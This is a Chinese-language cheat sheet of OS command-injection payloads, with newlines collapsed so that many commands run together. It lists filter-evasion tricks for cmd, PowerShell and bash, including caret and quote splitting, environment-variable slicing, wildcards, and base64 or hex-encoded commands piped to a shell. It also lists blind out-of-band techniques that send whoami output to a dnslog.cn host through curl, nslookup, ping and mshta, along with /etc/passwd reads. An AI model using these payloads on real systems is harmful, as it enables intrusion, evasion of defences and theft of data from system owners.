04-命令执行漏洞备忘录

&echo 111&&echo 111| echo 111|| echo 111;echo 111;sleep 5`echo 111``sleep 5`who`echo a`mi$(echo 111)%26%26echo 111%7c%7cecho 111

type *.*type *.???type .*.???type ????.???type f*.*type f*.???more *.*more *.???more .*.???more ????.???more f*.*more f*.???

tyPe flAg.tXtTyPe FlAg.TXT

type f"la"g.txttype fla""g.txt

type.flag.txttype,flag.txttype;flag.txttype=flag.txt

(type flag.txt)((type flag.txt))(,(type flag.txt),)

type flag.t^x^t,;((ty^pe fl^ag.t^xt))cmd /c ",;((ty^pe fl^ag.t^xt))"

powershell -command "$decodedCommand = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Y2F0IC4vZmxhZy50eHQK')); Invoke-Expression $decodedCommand"

set a=type&&set b=flag.txt&&%a% %b%

#切割示例set a=type&&set b=flag.txt&&%a:~0% %b%set a=type&&set b=flag.txt&&%a:~0,6% %b%#利用set查看环境变量值set#先查看%windir%和%HOMEPATH%变量值，再进行切割组合echo %windir%echo %HOMEPATH%%windir:~3,1%h%windir:~-3,1%%HOMEPATH:~-5,1%mi  ↓Whoami#先查看%ProgramFiles%变量值，再进行切割组合echo %ProgramFiles%%ProgramFiles:~9,1%%ProgramFiles:~5,1%%ProgramFiles:~7,1%%ProgramFiles:~-2,1% ????.???      ↓more ????.???%ProgramFiles:~9,1%%ProgramFiles:~5,1%%ProgramFiles:~7,1%%ProgramFiles:~-2,1% %ProgramFiles:~-5,1%*      ↓more ????.???#多手法组合绕过C^m""D /^c ",(,(s^Et ^ a=ty^Pe,f),,)&& (S^Et ^ b=lAg^.tXt)& , , C^aLl, sE^t c=%a%%b%& , , %LoCaLAPpdata:~ -3,+1%%pRoGramw6432:~9,1%d, ,/^c, ,%c%"                                 ↓cmd /c "set a=type,f&&set b=lag.txt&call set c=%a%%b%&cmd /c %c%"    

#以""进行字符串分割，选择第4列字符串进行执行for /f "tokens=4 delims=" %i in ("c:windowssystem32type flag.txt") do %i#以""进行字符串分割，选择C列和E列字符串，进行组合执行for /f "tokens=1,2,3,4,* delims=" %A in ("c:windowstypesystem32flag.txt") do %C %E

#以行为单位，进行文件内容读取for /F %i in (flag.txt) do echo %i#对行进行内容分割，delims指定以{}为分隔符，tokens指定列数位置，以下为第二列for /F "delims={} tokens=2" %i in (flag.txt) do echo %i

#匹配方式：[[:lower:]]：所有小写字母[[:upper:]]：所有大写字母[[:alpha:]]：所有字母[[:digit:]]：所有数字[[:alnum:]]：所有字母和数字[[:blank:]]：空白字符和TAB制表符[[:space:]]：包括空白字符、TAB制表符(t)、换页(f)[[:cntrl:]]：所有控制字符[[:graph:]]：可打印并可看到的字符。空格是可打印的，但是不是可看到的。[[:print:]]：所有可打印字符[[:punct:]]：所有标点符号，非字母、数字、控制字符和space字符。[[:xdigit:]]：十六进制数的字符。#排除方式：在前面加多一个!或是^即可[![:lower:]]：除了小写字母以外的其他字符[^[:lower:]]：除了小写字母以外的其他字符

#通配符配合其他绕过方式进行绕过# cat flag.txtcat f*??t *tcat ./fl[a-z]g.txtcat ./fl{a,b,c}g.txtcat${IFS}fl* cat${IFS}f???.txtcat${IFS}fl?[^1].txtcat f[![:digit:]]??.txt#/bin/cat flag.txt/???/?at flag.txt/???/?at ????????/???/?[a][t] ????????/???/?[a][t] ?''?''?''?''?''?''?''?''/???/?[a]''[t] ?''?''?''?''?''?''?''?''/???/?[[:lower:]]''[t] ?''?''?''?''?''?''?''?''

cat flag.txt #asdaaaa

who`cat flag.txt`miwho$(cat flag.txt)mi#利用提前执行绕过目标文件过滤限制，ls的输出作为cat的输入cat${IFS}`ls`

cat flag.txt

# "c"a"t flag.txtca""t flag.txt# 'c'a't flag.txtca''t flag.txt

a=ca;b=t;c=flag.txt;$a$b $c

#cat flag.txt#自定义字符串切割a=”bmadfrtn”; b=?${a:3:1}${a:7:1};c=${a:5:1}*; $b $ca=”bmadfrtn”; b=${a:3:1}${a:7:1};c=${a:5:1}; ?$b $c*#根据环境变量字符进行切割printenv   →  显示所有系统环境变量与值echo ${PATH}   →  打印环境变量echo ${PATH:34:2}   →  ca${PATH:34:2}? f*   →  ca? f*

# cat flag.txt 的编码转换# base64编码`echo Y2F0IGZsYWcudHh0Cg== | base64 -d`echo Y2F0IGZsYWcudHh0Cg== | base64 -d | bashecho Y2F0IGZsYWcudHh0Cg== | base64 -d | sh# shellcode编码$(printf "x63x61x74x20x66x6cx61x67x2ex74x78x74")$(printf "\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x74\x78\x74")`{printf,"x63x61x74x20x66x6cx61x67x2ex74x78x74"}`{printf,"x63x61x74x20x66x6cx61x67x2ex74x78x74"} | bash{printf,"x63x61x74x20x66x6cx61x67x2ex74x78x74"} | sh# hex编码，xxd为二进制显示和处理文件工具echo “0x63617420666c61672e747874” |xxd -r -p|bashecho "63617420666c61672e747874" | xxd -r -p|bash

# $1-$9ca$1t flag.txt# ${1-n}ca${1}t flag.txt# $@ca$@t flag.txt# $*ca$*t ./flag.txt#$ucat$u /etc/passwdcat /etc$u/passwd

printf "2f"    /或者可以从$PATH中取/echo $PATH|cut -c 1

#%20(space)cat%20./flag.txt#%09(tab)cat%09./flag.txt#${IFS}cat${IFS}./flag.txt#$IFS（IFS的默认值是空白，也包括空格，tab，新行）cat$IFS./flag.txt#$IFS$9($9为空字符)cat$IFS$9./flag.txt#<、<>cat<flag.txtcat<>flag.txt#,{cat,flag.txt}#x20a=$'x20flag.txt';cat$a

#利用文件名，进行重写入拼接，cat flag.txtmkdir a>a/g.txt>a/flag.txt\>a/cat \ls -t a>1sh 1mkdir a>a/txt>a/ag.\>a/fl\>a/t \>a/ca\ls -t a>1sh 1# 使用echo -n 输入到文件中拼接，cat<flag.txtecho -n c >> 1echo -n a >> 1echo -n t >> 1echo -n < >> 1echo -n f >> 1echo -n l >> 1echo -n a >> 1echo -n g >> 1echo -n . >> 1echo -n t >> 1echo -n x >> 1echo -n t >> 1sh 1#利用进行多行输入，拼接命令，cat<flag.txtcat<flag.txt或者重定向到文件里，采用shell运行echo 'c\' >> 1echo 'a\' >> 1echo 't\' >> 1echo '<\' >> 1echo 'f\' >> 1echo 'l\' >> 1echo 'a\' >> 1echo 'g\' >> 1echo '.\' >> 1echo 't\' >> 1echo 'x\' >> 1echo 't\' >> 1sh 1#四字节限制，利用反转进行拼接，cat f*#对排序要求比较严格，比较难用，当了解就好>tac>*f>dir*>v>rev*v>1sh 1

#http请求##1.公网服务器监听nc -lp 4444##2.发起http请求ip=|curl ip:4444#dns解析curl `whoami`.a0b637.dnslog.cnnslookup $(whoami | base64).a0b637.dnslog.cnping `whoami`.a0b637.dnslog.cn

#http请求##1.公网服务器监听nc -lp 4444##2.发起http请求ip=|curl ip:4444#dns解析ping %USERNAME%.a0b637.dnslog.cn##也可以配合远程下载的方法mshta http://%USERNAME%.a0b637.dnslog.cn

#睡眠延时判断ping -c 2 127.0.0.1 | sleep 2ping -c 2 127.0.0.1 | sleep 5#ping延时判断ping -c 3 127.0.0.1ping -c 6 127.0.0.1#查找静态文件，在同级目录下创建自定义内容的文件phpinfofind / -name "test.js" -execdir bash -c 'echo "123" > test.txt' ;

#ping延时判断ping -n 3 127.0.0.1ping -n 6 127.0.0.1#dir查找前端JS文件,了解即可，可以利用扫盘的时间差进行判断##默认shell当前盘符dir /s/a-d/b test.js##指定盘符dir c: /s/a-d/b | findstr test.js##默认shell当前盘符dir /x /s /b test.js##指定盘符dir c: /x /s /b | findstr test.js#for循环查找前端JS文件,了解即可，可以利用扫盘的时间差进行判断##默认shell当前盘符for /r %i in (test.js*) do @echo %i##指定盘符for /r c: %i in (test.js*) do @echo %i#查找静态文件，在同级目录下创建以当前路径为内容的文件，外网访问文件是否存在##默认shell当前盘符for /r %i in (test.js*) do @echo %i > %i.txt##指定盘符for /r c: %i in (test.js*) do @echo %i > %i.txt#powershell查找静态文件，在同级目录下创建自定义内容的文件powershell -command "Get-ChildItem -Path './' -Recurse -Filter 'test.js' | ForEach-Object { New-Item -Path $_.DirectoryName -Name 'test.txt' -ItemType 'file' -Value '123' }